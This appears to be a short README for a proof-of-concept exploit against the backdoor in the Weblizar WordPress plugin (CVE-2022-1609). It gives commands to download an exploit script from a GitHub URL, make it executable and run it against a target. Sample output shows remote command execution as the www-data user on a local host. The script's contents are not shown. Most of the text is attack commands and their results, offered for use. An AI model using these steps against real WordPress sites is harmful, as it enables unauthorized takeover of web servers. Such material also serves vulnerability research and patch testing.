Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor
wget https://raw.githubusercontent.com/0xSojalSec/CVE-2022-1609/main/exploit.sh
chmod +x exploit.sh
./exploit.sh
GH0ST_3exP10it$ ./exploit.sh http://127.0.0.1:8080
[+] Targeting http://127.0.0.1:8080
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data